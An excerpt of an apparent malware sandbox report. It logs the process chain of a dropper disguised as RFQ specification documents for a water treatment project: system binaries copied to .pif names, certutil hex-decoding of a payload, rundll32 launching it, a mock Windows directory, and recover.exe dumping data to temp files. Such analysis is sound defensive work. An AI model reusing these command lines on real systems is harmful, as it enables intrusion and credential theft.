Source: C:\Windows\SysWOW64\recover.exe |
Code function: 49_2_0040511A |
49_2_0040511A |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 49_2_0043C13A |
49_2_0043C13A |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 49_2_004051AB |
49_2_004051AB |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 49_2_00449300 |
49_2_00449300 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 49_2_0040D322 |
49_2_0040D322 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 49_2_0044A4F0 |
49_2_0044A4F0 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 49_2_0043A5AB |
49_2_0043A5AB |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 49_2_00413631 |
49_2_00413631 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 49_2_00446690 |
49_2_00446690 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 49_2_0044A730 |
49_2_0044A730 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 49_2_004398D8 |
49_2_004398D8 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 49_2_004498E0 |
49_2_004498E0 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 49_2_0044A886 |
49_2_0044A886 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 49_2_0043DA09 |
49_2_0043DA09 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 49_2_00438D5E |
49_2_00438D5E |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 49_2_00449ED0 |
49_2_00449ED0 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 49_2_0041FE83 |
49_2_0041FE83 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 49_2_00430F54 |
49_2_00430F54 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 53_2_004050C2 |
53_2_004050C2 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 53_2_004014AB |
53_2_004014AB |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 53_2_00405133 |
53_2_00405133 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 53_2_004051A4 |
53_2_004051A4 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 53_2_00401246 |
53_2_00401246 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 53_2_0040CA46 |
53_2_0040CA46 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 53_2_00405235 |
53_2_00405235 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 53_2_004032C8 |
53_2_004032C8 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 53_2_00401689 |
53_2_00401689 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 53_2_00402F60 |
53_2_00402F60 |
Source: C:\Users\Public\ANYDESK.PIF |
Code function: 60_2_02A220B4 |
60_2_02A220B4 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_0042809D |
62_2_0042809D |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_0045412B |
62_2_0045412B |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_004421C0 |
62_2_004421C0 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_004281D7 |
62_2_004281D7 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_0043E1E0 |
62_2_0043E1E0 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_0041E29B |
62_2_0041E29B |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_004373DA |
62_2_004373DA |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_00438380 |
62_2_00438380 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_00453472 |
62_2_00453472 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_0042747E |
62_2_0042747E |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_0043E43D |
62_2_0043E43D |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_004325A1 |
62_2_004325A1 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_0043774C |
62_2_0043774C |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_0041F809 |
62_2_0041F809 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_004379F6 |
62_2_004379F6 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_004279F5 |
62_2_004279F5 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_0044DAD9 |
62_2_0044DAD9 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_00433C73 |
62_2_00433C73 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_00413CA0 |
62_2_00413CA0 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_00437CBD |
62_2_00437CBD |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_0043DD82 |
62_2_0043DD82 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_00435F52 |
62_2_00435F52 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_00437F78 |
62_2_00437F78 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_0043DFB1 |
62_2_0043DFB1 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_06831143 |
62_2_06831143 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_06850697 |
62_2_06850697 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_0686F2CB |
62_2_0686F2CB |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_0686920E |
62_2_0686920E |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_06868268 |
62_2_06868268 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_06884300 |
62_2_06884300 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_0685830C |
62_2_0685830C |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_068310BC |
62_2_068310BC |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_0687304E |
62_2_0687304E |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_06859065 |
62_2_06859065 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_0686F06E |
62_2_0686F06E |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_0684F129 |
62_2_0684F129 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_0686EE3F |
62_2_0686EE3F |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_06858F2B |
62_2_06858F2B |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_0686EC10 |
62_2_0686EC10 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_06864B01 |
62_2_06864B01 |
Source: C:\Windows\SysWOW64\SndVol.exe |
Code function: 62_2_06858883 |
62_2_06858883 |
Source: unknown |
Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding |
|
Source: unknown |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y "C:\\Windows\\System32\\extrac32.exe" "C:\\Users\\Public\\expha.pif" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\rundll32.exe" "C:\\Users\\Public\\rdha.pif" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\Windows\System32\certutil.exe" "C:\\Users\\Public\\ghf.pif" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" "C:\Users\Public\HEW.3GP" 9 |
|
Source: C:\Users\Public\alpha.pif |
Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" "C:\Users\Public\HEW.3GP" 9 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12 |
|
Source: C:\Users\Public\alpha.pif |
Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c PING -n 2 127.0.0.1 |
|
Source: C:\Users\Public\alpha.pif |
Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\Public\rdha.pif C:\\Users\\Public\\rdha.pif zipfldr.dll,RouteTheCall C:\Users\Public\ANYDESK.PIF |
|
Source: C:\Users\Public\rdha.pif |
Process created: C:\Users\Public\ANYDESK.PIF "C:\Users\Public\ANYDESK.PIF" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe cmd /c exit /b 0 |
|
Source: C:\Users\Public\ANYDESK.PIF |
Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\5964.cmd"" |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\Public\ANYDESK.PIF |
Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\15897.cmd"" |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " |
|
Source: C:\Users\Public\ANYDESK.PIF |
Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" |
|
Source: unknown |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y "C:\\Windows\\System32\\extrac32.exe" "C:\\Users\\Public\\expha.pif" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\rundll32.exe" "C:\\Users\\Public\\rdha.pif" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\Windows\System32\certutil.exe" "C:\\Users\\Public\\ghf.pif" |
|
Source: C:\Windows\SysWOW64\colorcpl.exe |
Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw" |
|
Source: C:\Windows\SysWOW64\colorcpl.exe |
Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw" |
|
Source: C:\Windows\SysWOW64\colorcpl.exe |
Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw" |
|
Source: C:\Windows\SysWOW64\colorcpl.exe |
Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\wvqpzwbsnpkzgrsc" |
|
Source: C:\Windows\SysWOW64\colorcpl.exe |
Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\wvqpzwbsnpkzgrsc" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" "C:\Users\Public\HEW.3GP" 9 |
|
Source: C:\Windows\SysWOW64\colorcpl.exe |
Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg" |
|
Source: C:\Windows\SysWOW64\colorcpl.exe |
Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg" |
|
Source: C:\Windows\SysWOW64\colorcpl.exe |
Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg" |
|
Source: C:\Users\Public\alpha.pif |
Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" "C:\Users\Public\HEW.3GP" 9 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12 |
|
Source: C:\Users\Public\alpha.pif |
Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c PING -n 2 127.0.0.1 |
|
Source: C:\Users\Public\alpha.pif |
Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\Public\rdha.pif C:\\Users\\Public\\rdha.pif zipfldr.dll,RouteTheCall C:\Users\Public\ANYDESK.PIF |
|
Source: C:\Users\Public\rdha.pif |
Process created: C:\Users\Public\ANYDESK.PIF "C:\Users\Public\ANYDESK.PIF" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe cmd /c exit /b 0 |
|
Source: C:\Users\Public\ANYDESK.PIF |
Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y "C:\\Windows\\System32\\extrac32.exe" "C:\\Users\\Public\\expha.pif" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\rundll32.exe" "C:\\Users\\Public\\rdha.pif" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\Windows\System32\certutil.exe" "C:\\Users\\Public\\ghf.pif" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" "C:\Users\Public\HEW.3GP" 9 |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12 |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c PING -n 2 127.0.0.1 |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\Public\rdha.pif C:\\Users\\Public\\rdha.pif zipfldr.dll,RouteTheCall C:\Users\Public\ANYDESK.PIF |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe cmd /c exit /b 0 |
Jump to behavior |
Source: C:\Users\Public\alpha.pif |
Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" "C:\Users\Public\HEW.3GP" 9 |
Jump to behavior |
Source: C:\Users\Public\alpha.pif |
Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12 |
Jump to behavior |
Source: C:\Users\Public\alpha.pif |
Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1 |
Jump to behavior |
Source: C:\Users\Public\rdha.pif |
Process created: C:\Users\Public\ANYDESK.PIF "C:\Users\Public\ANYDESK.PIF" |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\5964.cmd"" |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\15897.cmd"" |
Jump to behavior |
Source: C:\Users\Public\ANYDESK.PIF |
Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10 |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw" |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw" |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw" |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\wvqpzwbsnpkzgrsc" |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\wvqpzwbsnpkzgrsc" |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg" |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg" |
Jump to behavior |
Source: C:\Windows\SysWOW64\colorcpl.exe |
Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y "C:\\Windows\\System32\\extrac32.exe" "C:\\Users\\Public\\expha.pif" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\rundll32.exe" "C:\\Users\\Public\\rdha.pif" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\Windows\System32\certutil.exe" "C:\\Users\\Public\\ghf.pif" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" "C:\Users\Public\HEW.3GP" 9 |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12 |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c PING -n 2 127.0.0.1 |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\Public\rdha.pif C:\\Users\\Public\\rdha.pif zipfldr.dll,RouteTheCall C:\Users\Public\ANYDESK.PIF |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe cmd /c exit /b 0 |
Jump to behavior |
Source: C:\Users\Public\alpha.pif |
Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" "C:\Users\Public\HEW.3GP" 9 |
|
Source: C:\Users\Public\alpha.pif |
Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12 |
|
Source: C:\Users\Public\alpha.pif |
Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1 |
|
Source: C:\Users\Public\rdha.pif |
Process created: C:\Users\Public\ANYDESK.PIF "C:\Users\Public\ANYDESK.PIF" |
|
Source: C:\Users\Public\ANYDESK.PIF |
Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: cmdext.dll |
Jump to behavior |
Source: C:\Windows\System32\extrac32.exe |
Section loaded: cabinet.dll |
Jump to behavior |
Source: C:\Windows\System32\extrac32.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\extrac32.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\extrac32.exe |
Section loaded: textinputframework.dll |
Jump to behavior |
Source: C:\Windows\System32\extrac32.exe |
Section loaded: coreuicomponents.dll |
Jump to behavior |
Source: C:\Windows\System32\extrac32.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Windows\System32\extrac32.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Windows\System32\extrac32.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\extrac32.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\extrac32.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\extrac32.exe |
Section loaded: textshaping.dll |
Jump to behavior |
Source: C:\Users\Public\expha.pif |
Section loaded: cabinet.dll |
Jump to behavior |
Source: C:\Users\Public\expha.pif |
Section loaded: cabinet.dll |
Jump to behavior |
Source: C:\Users\Public\expha.pif |
Section loaded: cabinet.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: certcli.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: cabinet.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: cryptui.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: ncrypt.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: netapi32.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: ntdsapi.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: certca.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: samcli.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: logoncli.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: dsrole.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: ntasn1.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: certcli.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: cabinet.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: cryptui.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: ncrypt.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: netapi32.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: ntdsapi.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: certca.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Users\Public\ghf.pif |
Section loaded: samcli.dll |
